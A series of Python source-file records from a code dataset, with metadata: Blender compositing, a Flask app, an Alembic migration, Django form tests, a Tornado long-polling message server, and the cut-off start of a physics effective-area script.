link %s - %s' % (link.from_socket, link.to_socket))\n link_name = link_name_overrides.get(link.from_socket.name, link.from_socket.name)\n for output in image_node.outputs:\n print('DEBUG: Checking output:', output.name, link_name)\n if output.name != link_name:\n continue\n links_to_create.append((output, link))\n break\n\n# Relinking previous render layer node outputs to the rendered image\nfor output, link in links_to_create:\n print('INFO: Connecting \"%s\" output to %s.%s input' % (\n output, link.to_node, link.to_socket\n ))\n scene.node_tree.links.new(output, link.to_socket)\n\n# Removing the nodes could potentially break the pipeline\nfor node in nodes_to_remove:\n print('INFO: Removing %s' % (node,))\n scene.node_tree.nodes.remove(node)\n\nbpy.ops.render.render(write_still=True)\n\nprint('INFO: Compositing completed')\nsys.exit(exitcode)\n", "sub_path": "BlendNet/script-compose.py", "file_name": "script-compose.py", "file_ext": "py", "file_size_in_byte": 4801, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "signal.signal", "line_number": 9, "usage_type": "call"}, {"api_name": "signal.SIGTERM", "line_number": 9, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 12, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 19, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 20, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 26, "usage_type": "attribute"}, {"api_name": "bpy.context", "line_number": 28, "usage_type": "attribute"}, {"api_name": "blend_file.getDependencies", "line_number": 35, "usage_type": "call"}, {"api_name": "bpy.path.basename", "line_number": 48, "usage_type": "call"}, {"api_name": "bpy.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 50, "usage_type": "call"}, {"api_name": "bpy.path.abspath", "line_number": 50, "usage_type": "call"}, {"api_name": "bpy.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "bpy.path.abspath", "line_number": 52, "usage_type": "call"}, {"api_name": "bpy.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "bpy.ops.image.open", "line_number": 54, "usage_type": "call"}, {"api_name": "bpy.ops", "line_number": 54, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 55, "usage_type": "attribute"}, {"api_name": "bpy.path.basename", "line_number": 55, "usage_type": "call"}, {"api_name": "bpy.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "bpy.path.abspath", "line_number": 64, "usage_type": "call"}, {"api_name": "bpy.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 65, "usage_type": "call"}, {"api_name": "bpy.path.abspath", "line_number": 
65, "usage_type": "call"}, {"api_name": "bpy.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "os.rename", "line_number": 66, "usage_type": "call"}, {"api_name": "bpy.path.abspath", "line_number": 66, "usage_type": "call"}, {"api_name": "bpy.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 70, "usage_type": "call"}, {"api_name": "bpy.path.abspath", "line_number": 73, "usage_type": "call"}, {"api_name": "bpy.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "bpy.types", "line_number": 97, "usage_type": "attribute"}, {"api_name": "bpy.ops.render.render", "line_number": 126, "usage_type": "call"}, {"api_name": "bpy.ops", "line_number": 126, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 129, "usage_type": "call"}]} +{"seq_id": "213067875", "text": "import json\n\n\nprefix_file = open(\"Script/Modifiable_variables/prefix.json\", \"r\")\nprefix = json.load(prefix_file)\nprefix_file.close()\nPrefix = {}\nfor guild_id, bot_prefix in prefix.items():\n Prefix[int(guild_id)] = bot_prefix\n\nvotes_file = open(\"Script/Modifiable_variables/votes.json\", \"r\")\nvotes = json.load(votes_file)\nvotes_file.close()\nVotes = {}\nfor member_id, points in votes.items():\n Votes[int(member_id)] = points\n\nsupport_file = open(\"Script/Modifiable_variables/support_role_ for_tickets.json\", \"r\")\nsupport = json.load(support_file)\nsupport_file.close()\nSupport = {}\nfor guild_id, support_id in support.items():\n Support[int(guild_id)] = support_id\n", "sub_path": "Script/Modifiable_variables/import_var.py", "file_name": "import_var.py", "file_ext": "py", "file_size_in_byte": 670, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "json.load", "line_number": 5, "usage_type": "call"}, {"api_name": "json.load", "line_number": 12, "usage_type": "call"}, {"api_name": "json.load", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "105666759", "text": "#!/usr/bin/python\n\nfrom flask import Flask, render_template, request\nfrom simulation import Universe\n\napp = Flask(__name__)\n\n@app.route('/', methods=['GET', 'POST'])\ndef home():\n if request.method == 'GET':\n return render_template('start.html')\n return render_template('results.html', log=simulate(request.form))\n\ndef simulate(params):\n universe = Universe(int(params['population']) or 100, int(params['locations']) or 10)\n universe.run(10)\n return universe.log\n\nif __name__ == \"__main__\":\n app.run()\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 526, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "flask.Flask", "line_number": 6, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 10, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 10, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 11, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 12, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 12, "usage_type": "name"}, {"api_name": "simulation.Universe", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "241112434", "text": "# uncompyle6 version 3.7.4\n# Python bytecode 3.8 (3413)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 
8.4.0]\n# Embedded file name: c:\\users\\jonat\\code\\snek_cogs\\tarot\\cogs\\tarot\\t_data\\json_data.py\n# Compiled at: 2020-01-06 10:13:36\n# Size of source mod 2**32: 373 bytes\nimport json, os\nDIR_PATH = os.path.dirname(os.path.realpath(__file__))\nwith open(DIR_PATH + '/tarot_spreads.json') as (f):\n tarot_spreads = json.load(f)\nwith open(DIR_PATH + '/tarot_data.json') as (f):\n tarot_data = json.load(f)\nwith open(DIR_PATH + '/tarot_skins.json') as (f):\n tarot_skins = json.load(f)", "sub_path": "pycfiles/d_snek_cogs_tarot-0.1.1-py3-none-any/json_data.cpython-38.py", "file_name": "json_data.cpython-38.py", "file_ext": "py", "file_size_in_byte": 613, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.path.dirname", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 9, "usage_type": "call"}, {"api_name": "json.load", "line_number": 11, "usage_type": "call"}, {"api_name": "json.load", "line_number": 13, "usage_type": "call"}, {"api_name": "json.load", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "58852985", "text": "\"\"\"empty message\n\nRevision ID: 5261344d5bfb\nRevises: 40580ec50dd5\nCreate Date: 2014-09-05 12:08:43.139721\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '5261344d5bfb'\ndown_revision = '40580ec50dd5'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('users', sa.Column('age', sa.Integer(), nullable=True))\n op.add_column('users', sa.Column('name', sa.String(length=255), nullable=True))\n op.add_column('users', sa.Column('study', sa.String(length=255), nullable=True))\n op.add_column('users', sa.Column('twitter_handle', sa.String(length=255), nullable=True))\n op.add_column('users', sa.Column('work', sa.String(length=255), nullable=True))\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! 
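Note on the decompiled json_data record above (seq_id 241112434): it locates its JSON files via string concatenation on os.path.dirname(os.path.realpath(__file__)). A pathlib sketch of the same load-next-to-the-module idiom:

    import json
    from pathlib import Path

    DIR_PATH = Path(__file__).resolve().parent

    def load_json(name):
        """Load a JSON file that ships alongside this module."""
        with open(DIR_PATH / name, encoding='utf-8') as f:
            return json.load(f)

    # e.g. tarot_spreads = load_json('tarot_spreads.json')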
###\n op.drop_column('users', 'work')\n op.drop_column('users', 'twitter_handle')\n op.drop_column('users', 'study')\n op.drop_column('users', 'name')\n op.drop_column('users', 'age')\n ### end Alembic commands ###\n", "sub_path": "migrations/versions/5261344d5bfb_.py", "file_name": "5261344d5bfb_.py", "file_ext": "py", "file_size_in_byte": 1099, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "alembic.op.add_column", "line_number": 19, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 19, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 19, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 19, "usage_type": "call"}, {"api_name": "alembic.op.add_column", "line_number": 20, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 20, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 20, "usage_type": "call"}, {"api_name": "alembic.op.add_column", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op.add_column", "line_number": 22, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 22, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 22, "usage_type": "call"}, {"api_name": "alembic.op.add_column", "line_number": 23, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 23, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 23, "usage_type": "call"}, {"api_name": "alembic.op.drop_column", "line_number": 29, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 29, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 30, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 30, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 31, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 31, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 32, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 32, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 33, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 33, "usage_type": "name"}]} +{"seq_id": "564437857", "text": "from __future__ import unicode_literals\n\nimport datetime\n\nimport mock\n\nimport pytz\n\nfrom tracpro.test import factories\nfrom tracpro.test.cases import TracProTest\n\nfrom .. 
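Note on the Alembic migration record above (seq_id 58852985): the autogenerated upgrade adds its columns as nullable=True, the only way to add a column to a populated table without a default. If a column must end up NOT NULL, the usual recipe is to backfill via server_default; a sketch with the same op/sa API (the default value '0' is an assumption, and the snippet runs only inside an Alembic migration context):

    from alembic import op
    import sqlalchemy as sa

    def upgrade():
        # server_default backfills existing rows, so NOT NULL can be satisfied.
        op.add_column(
            'users',
            sa.Column('age', sa.Integer(), nullable=False, server_default='0'),
        )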
import forms\n\n\nclass TestPollChartFilterForm(TracProTest):\n\n def setUp(self):\n super(TestPollChartFilterForm, self).setUp()\n\n self.org = factories.Org()\n\n # Mock time-dependent utilities so that there is a testable result.\n self.month_range_patcher1 = mock.patch('tracpro.polls.forms.get_month_range')\n self.mock_get_month_range1 = self.month_range_patcher1.start()\n self.mock_get_month_range1.return_value = (\n datetime.datetime(2016, 2, 1, tzinfo=pytz.UTC),\n datetime.datetime(2016, 3, 1, tzinfo=pytz.UTC),\n )\n self.month_range_patcher2 = mock.patch('tracpro.charts.filters.get_month_range')\n self.mock_get_month_range2 = self.month_range_patcher2.start()\n self.mock_get_month_range2.return_value = (\n datetime.datetime(2016, 2, 1, tzinfo=pytz.UTC),\n datetime.datetime(2016, 3, 1, tzinfo=pytz.UTC),\n )\n\n # Data to pass to form for testing.\n self.data = {\n 'numeric': 'response-rate',\n 'date_range': 'custom',\n 'start_date': datetime.datetime(2014, 1, 15, tzinfo=pytz.UTC),\n 'end_date': datetime.datetime(2014, 10, 22, tzinfo=pytz.UTC),\n 'split_regions': False,\n }\n\n def tearDown(self):\n super(TestPollChartFilterForm, self).tearDown()\n self.month_range_patcher1.stop()\n self.month_range_patcher2.stop()\n\n def test_initial(self):\n \"\"\"Default data should be set if data is not passed to the form.\"\"\"\n form = forms.PollChartFilterForm(org=self.org)\n self.assertTrue(form.is_bound)\n self.assertTrue(form.is_valid())\n self.assertDictEqual(form.data, {\n 'numeric': 'sum',\n 'date_range': 'month',\n 'start_date': datetime.datetime(2016, 2, 1, tzinfo=pytz.UTC),\n 'end_date': datetime.datetime(2016, 2, 29, tzinfo=pytz.UTC),\n 'split_regions': False,\n })\n\n def test_numeric_required(self):\n \"\"\"Data type choice is required.\"\"\"\n self.data.pop('numeric')\n form = forms.PollChartFilterForm(org=self.org, data=self.data)\n self.assertFalse(form.is_valid())\n self.assertDictEqual(form.errors, {\n 'numeric': ['This field is required.'],\n })\n\n def test_numeric_invalid(self):\n \"\"\"Data type must come from list of valid choices.\"\"\"\n self.data['numeric'] = 'invalid'\n form = forms.PollChartFilterForm(org=self.org, data=self.data)\n self.assertFalse(form.is_valid())\n self.assertDictEqual(form.errors, {\n 'numeric': ['Select a valid choice. 
'\n 'invalid is not one of the available choices.'],\n })\n", "sub_path": "tracpro/polls/tests/test_forms.py", "file_name": "test_forms.py", "file_ext": "py", "file_size_in_byte": 2907, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "tracpro.test.cases.TracProTest", "line_number": 15, "usage_type": "name"}, {"api_name": "tracpro.test.factories.Org", "line_number": 20, "usage_type": "call"}, {"api_name": "tracpro.test.factories", "line_number": 20, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 26, "usage_type": "call"}, {"api_name": "pytz.UTC", "line_number": 26, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 27, "usage_type": "call"}, {"api_name": "pytz.UTC", "line_number": 27, "usage_type": "attribute"}, {"api_name": "mock.patch", "line_number": 29, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 32, "usage_type": "call"}, {"api_name": "pytz.UTC", "line_number": 32, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 33, "usage_type": "call"}, {"api_name": "pytz.UTC", "line_number": 33, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 40, "usage_type": "call"}, {"api_name": "pytz.UTC", "line_number": 40, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 41, "usage_type": "call"}, {"api_name": "pytz.UTC", "line_number": 41, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 58, "usage_type": "call"}, {"api_name": "pytz.UTC", "line_number": 58, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 59, "usage_type": "call"}, {"api_name": "pytz.UTC", "line_number": 59, "usage_type": "attribute"}]} +{"seq_id": "358274354", "text": "import logging\r\nimport tornado.escape\r\nimport tornado.ioloop\r\nimport tornado.web\r\nimport tornado.httpserver\r\nimport os.path\r\nimport uuid\r\n\r\nfrom tornado.concurrent import Future\r\nfrom tornado import gen\r\nfrom tornado.options import define, options, parse_command_line\r\nfrom tornado.web import HTTPError\r\nBASE_DIR = os.path.dirname(__file__)\r\ndefine(\"port\", default=8888, help=\"run on the given port\", type=int)\r\ndefine(\"debug\", default=False, help=\"run in debug mode\")\r\ndefine(\"max_cache_msg\", default=200, help=\"max cache message size\", type=int)\r\ndefine(\"max_channel\", default=50, help=\"max channel size\", type=int)\r\ndefine(\"max_admin_token\", default=50, help=\"max admin size\", type=int)\r\ndefine('admin_token', multiple=True)\r\ndefine('config', default=os.path.join(BASE_DIR, 'wxcomet.conf'), help='wxcomet config file')\r\ndefine('login_url', default='/admin/login', help='login url for admin token')\r\n\r\n\r\nclass MessageChannel(object):\r\n def __init__(self, **kwargs):\r\n self.waiters = set()\r\n self.cache = []\r\n self.cache_size = kwargs['cache'] if kwargs.get('cache') else options.max_cache_msg\r\n self.name = kwargs['name'] if kwargs.get('name') else uuid.uuid4().hex\r\n self.token = kwargs['token'] if kwargs.get('token') else uuid.uuid4().hex\r\n\r\n def wait_for_messages(self, cursor=None):\r\n # Construct a Future to return to our caller. This allows\r\n # wait_for_messages to be yielded from a coroutine even though\r\n # it is not a coroutine itself. 
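Note on the tracpro test_forms record above (seq_id 564437857): TestPollChartFilterForm pins time-dependent code by calling mock.patch(...).start() in setUp and .stop() in tearDown (it imports the standalone mock package; unittest.mock is the stdlib equivalent). The same start/stop mechanic in a self-contained form, patching a real attribute so the snippet runs as-is:

    import json
    from unittest import mock

    patcher = mock.patch('json.dumps', return_value='"patched"')
    mock_dumps = patcher.start()
    try:
        assert json.dumps({'a': 1}) == '"patched"'
        assert mock_dumps.call_count == 1
    finally:
        patcher.stop()   # always undo, or the patch leaks into other tests

    assert json.dumps({'a': 1}) == '{"a": 1}'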
We will set the result of the\r\n # Future when results are available.\r\n result_future = Future()\r\n if cursor:\r\n new_count = 0\r\n for msg in reversed(self.cache):\r\n if msg[\"id\"] == cursor:\r\n break\r\n new_count += 1\r\n if new_count:\r\n result_future.set_result(self.cache[-new_count:])\r\n return result_future\r\n self.waiters.add(result_future)\r\n return result_future\r\n\r\n def info(self):\r\n return dict(name=self.name, token=self.token,\r\n cache=len(self.cache), waiter=len(self.waiters))\r\n\r\n def __str__(self):\r\n return \"%r listeners, %r msg\"%(len(self.waiters), len(self.cache))\r\n\r\n def cancel_wait(self, future):\r\n self.waiters.remove(future)\r\n # Set an empty result to unblock any coroutines waiting.\r\n future.set_result([])\r\n\r\n def new_messages(self, messages):\r\n logging.debug(\"Sending new message to %r listeners from channel-%s\", len(self.waiters), self.name)\r\n for future in self.waiters:\r\n future.set_result(messages)\r\n self.waiters = set()\r\n self.cache.extend(messages)\r\n if len(self.cache) > self.cache_size:\r\n self.cache = self.cache[-self.cache_size:]\r\n\r\n def close(self):\r\n logging.info(\"close channel %s, %d listeners, %d msg\", self.name)\r\n for future in self.waiters:\r\n self.cancel_wait(future)\r\n\r\nclass MessageUpdatesHandler(tornado.web.RequestHandler):\r\n @gen.coroutine\r\n def get(self):\r\n cursor = self.get_argument(\"cursor\", None)\r\n self.name = self.get_argument('name')\r\n # token = self.get_argument('token', None)\r\n c = self.application.channel(self.name)\r\n if c:\r\n self.future = c.wait_for_messages(cursor=cursor)\r\n messages = yield self.future\r\n else:\r\n raise HTTPError(403, \"channel %s is not in server or token error\",\r\n self.name)\r\n\r\n if self.request.connection.stream.closed():\r\n return\r\n self.write(dict(messages=messages))\r\n\r\n\r\n def on_connection_close(self):\r\n if self.future:\r\n c = self.application.channel(self.name)\r\n if c:\r\n c.cancel_wait(self.future)\r\n\r\n\r\n\r\nclass BaseHandler(tornado.web.RequestHandler):\r\n TOKEN_NAME = 'token'\r\n def get_current_user(self):\r\n token = self.get_argument(self.TOKEN_NAME, None)\r\n if options.admin_token:\r\n if token and token in options.admin_token:\r\n # TODO: make token safe\r\n return {'token':token, 'name':\"admin\"}\r\n else:\r\n return {\"name\":\"anonymous\", \"token\":None}\r\n\r\n def info(self):\r\n name = self.get_argument('name', None)\r\n token = self.get_argument('token', None)\r\n if self.current_user:\r\n # admin\r\n c = self.application.channel(name=name, create=True);\r\n if c: self.write(c.info())\r\n elif name and token:\r\n # user\r\n c = self.application.channel(name=name)\r\n if c and c.token == token:\r\n return self.write(c.info())\r\n else:\r\n raise HTTPError(400)\r\n\r\n def push(self):\r\n message = {\r\n \"id\": str(uuid.uuid4()),\r\n \"content\": self.get_argument(\"content\"),\r\n }\r\n name = self.get_argument(\"name\") # auto raise the argumen missing error\r\n logging.info(\"push message %s in channel %s\", message[\"id\"], name)\r\n self.application.broadcast(name, message)\r\n self.write({\"success\":True})\r\n\r\n def broadcast(self):\r\n message = {\r\n \"id\": str(uuid.uuid4()),\r\n \"content\": self.get_argument(\"content\"),\r\n }\r\n logging.info(\"broadcast message %s \", message[\"id\"])\r\n self.application.broadcast(None, message)\r\n self.write({\"success\":True})\r\n\r\nclass AuthLoginHandler(BaseHandler):\r\n def get(self):\r\n if self.current_user:\r\n 
self.write(\"hello %s, welcome\"%self.current_user['name'])\r\n else:\r\n raise HTTPError(400)\r\n\r\nclass AdminHandler(BaseHandler):\r\n def _get_or_post(self):\r\n action = self.get_argument('action', None)\r\n name = self.get_argument('name', None)\r\n if not action:\r\n raise HTTPError(400)\r\n elif action == 'info':\r\n self.info()\r\n elif action == 'push':\r\n self.push()\r\n elif action == 'broadcast':\r\n self.broadcast()\r\n\r\n @tornado.web.authenticated\r\n def get(self):\r\n self._get_or_post()\r\n\r\n @tornado.web.authenticated\r\n def post(self):\r\n self._get_or_post()\r\n\r\nclass wxCometApplication(tornado.web.Application):\r\n def __init__(self):\r\n handlers = [\r\n (r\"/a/message/updates\", MessageUpdatesHandler),\r\n (r\"/admin\", AdminHandler),\r\n (r\"/admin/login\", AuthLoginHandler),\r\n ]\r\n settings = dict(\r\n debug=options.debug,\r\n login_url = options.login_url\r\n )\r\n super(wxCometApplication, self).__init__(handlers, **settings)\r\n\r\n self._channels = dict()\r\n self.channel(name='default', create=True)\r\n\r\n def channel(self, name='default', create=False, **kwargs):\r\n \"\"\"get channel by name\r\n \"\"\"\r\n if not name:\r\n name = 'default'\r\n if name in self._channels:\r\n return self._channels[name]\r\n elif create:\r\n if len(self._channels) >= options.max_channel:\r\n logging.warning('too many channel, can not create new channnel %s', name)\r\n return None\r\n logging.info('create a new channel %s', name)\r\n self._channels[name] = MessageChannel(name=name, **kwargs)\r\n return self._channels[name]\r\n else:\r\n return None\r\n\r\n def broadcast(self, name, message):\r\n if name:\r\n c = self.channel(name)\r\n if c:\r\n c.new_messages([message])\r\n else:\r\n for c in self._channels.values():\r\n c.new_messages([message])\r\n\r\n\r\ndef main():\r\n parse_command_line()\r\n if options.config:\r\n options.parse_config_file(options.config)\r\n http_server = tornado.httpserver.HTTPServer(wxCometApplication())\r\n http_server.listen(options.port)\r\n tornado.ioloop.IOLoop.current().start()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n", "sub_path": "wxcomet/wxcomet.py", "file_name": "wxcomet.py", "file_ext": "py", "file_size_in_byte": 8059, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.path.path.dirname", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 13, "usage_type": "name"}, {"api_name": "tornado.options.define", "line_number": 14, "usage_type": "call"}, {"api_name": "tornado.options.define", "line_number": 15, "usage_type": "call"}, {"api_name": "tornado.options.define", "line_number": 16, "usage_type": "call"}, {"api_name": "tornado.options.define", "line_number": 17, "usage_type": "call"}, {"api_name": "tornado.options.define", "line_number": 18, "usage_type": "call"}, {"api_name": "tornado.options.define", "line_number": 19, "usage_type": "call"}, {"api_name": "tornado.options.define", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 20, "usage_type": "name"}, {"api_name": "tornado.options.define", "line_number": 21, "usage_type": "call"}, {"api_name": "tornado.options.options.max_cache_msg", "line_number": 28, "usage_type": "attribute"}, {"api_name": 
"tornado.options.options", "line_number": 28, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 29, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 30, "usage_type": "call"}, {"api_name": "tornado.concurrent.Future", "line_number": 37, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 63, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 72, "usage_type": "call"}, {"api_name": "tornado.escape.web", "line_number": 76, "usage_type": "attribute"}, {"api_name": "tornado.escape", "line_number": 76, "usage_type": "name"}, {"api_name": "tornado.web.HTTPError", "line_number": 87, "usage_type": "call"}, {"api_name": "tornado.gen.coroutine", "line_number": 77, "usage_type": "attribute"}, {"api_name": "tornado.gen", "line_number": 77, "usage_type": "name"}, {"api_name": "tornado.escape.web", "line_number": 103, "usage_type": "attribute"}, {"api_name": "tornado.escape", "line_number": 103, "usage_type": "name"}, {"api_name": "tornado.options.options.admin_token", "line_number": 107, "usage_type": "attribute"}, {"api_name": "tornado.options.options", "line_number": 107, "usage_type": "name"}, {"api_name": "tornado.options.options.admin_token", "line_number": 108, "usage_type": "attribute"}, {"api_name": "tornado.options.options", "line_number": 108, "usage_type": "name"}, {"api_name": "tornado.web.HTTPError", "line_number": 127, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 131, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 135, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 141, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 144, "usage_type": "call"}, {"api_name": "tornado.web.HTTPError", "line_number": 153, "usage_type": "call"}, {"api_name": "tornado.web.HTTPError", "line_number": 160, "usage_type": "call"}, {"api_name": "tornado.escape.web", "line_number": 168, "usage_type": "attribute"}, {"api_name": "tornado.escape", "line_number": 168, "usage_type": "name"}, {"api_name": "tornado.escape.web", "line_number": 172, "usage_type": "attribute"}, {"api_name": "tornado.escape", "line_number": 172, "usage_type": "name"}, {"api_name": "tornado.escape.web", "line_number": 176, "usage_type": "attribute"}, {"api_name": "tornado.escape", "line_number": 176, "usage_type": "name"}, {"api_name": "tornado.options.options.debug", "line_number": 184, "usage_type": "attribute"}, {"api_name": "tornado.options.options", "line_number": 184, "usage_type": "name"}, {"api_name": "tornado.options.options.login_url", "line_number": 185, "usage_type": "attribute"}, {"api_name": "tornado.options.options", "line_number": 185, "usage_type": "name"}, {"api_name": "tornado.options.options.max_channel", "line_number": 200, "usage_type": "attribute"}, {"api_name": "tornado.options.options", "line_number": 200, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 201, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 203, "usage_type": "call"}, {"api_name": "tornado.options.parse_command_line", "line_number": 220, "usage_type": "call"}, {"api_name": "tornado.options.options.config", "line_number": 221, "usage_type": "attribute"}, {"api_name": "tornado.options.options", "line_number": 221, "usage_type": "name"}, {"api_name": "tornado.options.options.parse_config_file", "line_number": 222, "usage_type": "call"}, {"api_name": "tornado.options.options", "line_number": 222, "usage_type": "name"}, {"api_name": "tornado.options.options.config", "line_number": 
222, "usage_type": "attribute"}, {"api_name": "tornado.escape.httpserver.HTTPServer", "line_number": 223, "usage_type": "call"}, {"api_name": "tornado.escape.httpserver", "line_number": 223, "usage_type": "attribute"}, {"api_name": "tornado.escape", "line_number": 223, "usage_type": "name"}, {"api_name": "tornado.options.options.port", "line_number": 224, "usage_type": "attribute"}, {"api_name": "tornado.options.options", "line_number": 224, "usage_type": "name"}, {"api_name": "tornado.escape.ioloop.IOLoop.current", "line_number": 225, "usage_type": "call"}, {"api_name": "tornado.escape.ioloop", "line_number": 225, "usage_type": "attribute"}, {"api_name": "tornado.escape", "line_number": 225, "usage_type": "name"}]} +{"seq_id": "648002266", "text": "\"\"\"effectiveAreaCalculator_v5.\nUsage: effectiveAreaCalculator.py PRE POST MC MODELS OUTPUT EMIN EMAX ZENMAX EBINS ZENBINS BATCHES [--read_pickle]\n\n-h --help Show this screen.\nPRE Input path to HDF5 file containing (pre-sim) mgs-data.\nPOST Input path to HDF5 file containing (level 4) mgs-data.\nMC Input path to HDF5 file containing (level 4) corsica data.\nMODELS Input path to pickle file containing models.\nOUTPUT Output path.\nEMIN Lower Limit of energy interval (logscale: 10^EMIN).\nEMAX Upper limit of energy interval (logscale: 10^EMAX).\nZENMAX Upper Limit of zenith interval\nEBINS Number of energy intervals.\nZENBINS Number of zenith intervals.\nBATCHES Number of batches to split up input.\n--read_pickle Flag determining weather corsica data have to be read from hdf5 or from pickle\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport h5py\nfrom docopt import docopt\nfrom sklearn.externals import joblib\nfrom dataMethods_mgs import load_data as load_data_mgs\nfrom dataMethods_corsica import load_data as load_data_corsica\n\nr_sim = 800\nh_sim = 1600\nA_sim = 2 * np.pi * r_sim * h_sim + 2 * np.pi * r_sim**2\n\n\ndef gen_labels(label, att):\n \"\"\"Generates Labels from data.\n\n Parameters\n ----------\n label : Pandas Dataframe\n Labels\n\n att : Pandas Dataframe\n Attributes\n\n Returns\n -------\n labels_S : array, shape=(len(lab),)\n Label for S classification\n\n labels_Q : array, shape=(len(lab),)\n Label for Q classification\n\n labels_M : 